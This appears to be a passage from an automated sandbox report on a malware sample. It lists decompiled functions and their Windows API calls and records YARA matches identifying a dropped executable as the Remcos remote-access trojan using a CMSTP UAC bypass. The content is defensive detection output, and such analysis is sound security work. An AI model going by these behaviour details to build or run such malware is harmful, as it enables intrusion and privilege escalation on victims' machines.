                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B516B5 NtdllDialogWndProc_W,0_2_00B516B5
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B516DE GetParent,NtdllDialogWndProc_W,0_2_00B516DE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B5167D NtdllDialogWndProc_W,0_2_00B5167D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDD78C NtdllDialogWndProc_W,0_2_00BDD78C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B5189B NtdllDialogWndProc_W,0_2_00B5189B
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDBC5D NtdllDialogWndProc_W,CallWindowProcW,0_2_00BDBC5D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00BDBF8C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDBF30 NtdllDialogWndProc_W,0_2_00BDBF30
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,2_2_0041ACC1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,2_2_0041ACED
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_006C3633
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_0074C1AC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_0074C498
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C57D SendMessageW,NtdllDialogWndProc_W,2_2_0074C57D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_0074C5FE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C860 NtdllDialogWndProc_W,2_2_0074C860
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C8BE NtdllDialogWndProc_W,2_2_0074C8BE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C88F NtdllDialogWndProc_W,2_2_0074C88F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C93E ClientToScreen,NtdllDialogWndProc_W,2_2_0074C93E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074C909 NtdllDialogWndProc_W,2_2_0074C909
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074CA7C GetWindowLongW,NtdllDialogWndProc_W,2_2_0074CA7C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0074CABC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W,2_2_006C1287
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_006C1290
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074D3B8 NtdllDialogWndProc_W,2_2_0074D3B8
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_0074D43E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C167D NtdllDialogWndProc_W,2_2_006C167D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C16DE GetParent,NtdllDialogWndProc_W,2_2_006C16DE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C16B5 NtdllDialogWndProc_W,2_2_006C16B5
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074D78C NtdllDialogWndProc_W,2_2_0074D78C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C189B NtdllDialogWndProc_W,2_2_006C189B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074BC5D NtdllDialogWndProc_W,CallWindowProcW,2_2_0074BC5D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074BF30 NtdllDialogWndProc_W,2_2_0074BF30
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_0074BF8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,5_2_0041ACC1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,5_2_0041ACED
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00BBA1EF
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BA8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00BA8310
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BB51BD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,2_2_004158B9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_007251BD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004158B9
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7D9750_2_00B7D975
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B721C50_2_00B721C5
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B862D20_2_00B862D2
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BD03DA0_2_00BD03DA
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B8242E0_2_00B8242E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B725FA0_2_00B725FA
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B5E6A00_2_00B5E6A0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B666E10_2_00B666E1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BAE6160_2_00BAE616
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B8878F0_2_00B8878F
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB88890_2_00BB8889
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B688080_2_00B68808
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BD08570_2_00BD0857
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B868440_2_00B86844
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7CB210_2_00B7CB21
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B86DB60_2_00B86DB6
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B66F9E0_2_00B66F9E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B630300_2_00B63030
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B731870_2_00B73187
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7F1D90_2_00B7F1D9
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B512870_2_00B51287
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B714840_2_00B71484
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B655200_2_00B65520
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B776960_2_00B77696
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B657600_2_00B65760
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B719780_2_00B71978
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B89AB50_2_00B89AB5
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B5FCE00_2_00B5FCE0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7BDA60_2_00B7BDA6
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B71D900_2_00B71D90
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BD7DDB0_2_00BD7DDB
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B63FE00_2_00B63FE0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B5DF000_2_00B5DF00
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_0100ACB00_2_0100ACB0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041D0712_2_0041D071
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004520D22_2_004520D2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043D0982_2_0043D098
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004371502_2_00437150
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004361AA2_2_004361AA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004262542_2_00426254
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004313772_2_00431377
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041E5DF2_2_0041E5DF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0044C7392_2_0044C739
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004267CB2_2_004267CB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043C9DD2_2_0043C9DD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00432A492_2_00432A49
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043CC0C2_2_0043CC0C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00434D222_2_00434D22
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00426E732_2_00426E73
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00440E202_2_00440E20
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043CE3B2_2_0043CE3B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00412F452_2_00412F45
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00452F002_2_00452F00
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00426FAD2_2_00426FAD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006ED9752_2_006ED975
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E21C52_2_006E21C5
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006F62D22_2_006F62D2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007403DA2_2_007403DA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006F242E2_2_006F242E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E25FA2_2_006E25FA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0071E6162_2_0071E616
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D66E12_2_006D66E1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006CE6A02_2_006CE6A0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006F878F2_2_006F878F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007408572_2_00740857
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006F68442_2_006F6844
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D88082_2_006D8808
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007288892_2_00728889
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006ECB212_2_006ECB21
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006F6DB62_2_006F6DB6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D6F9E2_2_006D6F9E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D30302_2_006D3030
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006EF1D92_2_006EF1D9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E31872_2_006E3187
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006C12872_2_006C1287
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E14842_2_006E1484
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D55202_2_006D5520
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E76962_2_006E7696
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D57602_2_006D5760
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E19782_2_006E1978
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006F9AB52_2_006F9AB5
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006CFCE02_2_006CFCE0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00747DDB2_2_00747DDB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006EBDA62_2_006EBDA6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006E1D902_2_006E1D90
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006CDF002_2_006CDF00
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_006D3FE02_2_006D3FE0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_011476702_2_01147670
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 4_2_00F6AB684_2_00F6AB68
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041D0715_2_0041D071
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004520D25_2_004520D2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043D0985_2_0043D098
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004371505_2_00437150
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004361AA5_2_004361AA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004262545_2_00426254
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004313775_2_00431377
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041E5DF5_2_0041E5DF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0044C7395_2_0044C739
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004267CB5_2_004267CB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043C9DD5_2_0043C9DD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00432A495_2_00432A49
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043CC0C5_2_0043CC0C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00434D225_2_00434D22
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00426E735_2_00426E73
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00440E205_2_00440E20
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043CE3B5_2_0043CE3B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00412F455_2_00412F45
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00452F005_2_00452F00
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00426FAD5_2_00426FAD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0151A3285_2_0151A328
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: String function: 00B70AE3 appears 70 times
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: String function: 00B78900 appears 42 times
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: String function: 00B57DE1 appears 35 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00444B14 appears 56 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00404C9E appears 32 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 004020E7 appears 79 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00401E8F appears 37 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00401D64 appears 43 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00447174 appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 006E0AE3 appears 70 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 004040BB appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00401F66 appears 100 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00410D8D appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 004338A5 appears 82 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00401FAA appears 42 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00403B40 appears 44 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 006E8900 appears 42 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 006C7DE1 appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: String function: 00433FB0 appears 110 times
                    Source: l1QC9H0SNR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
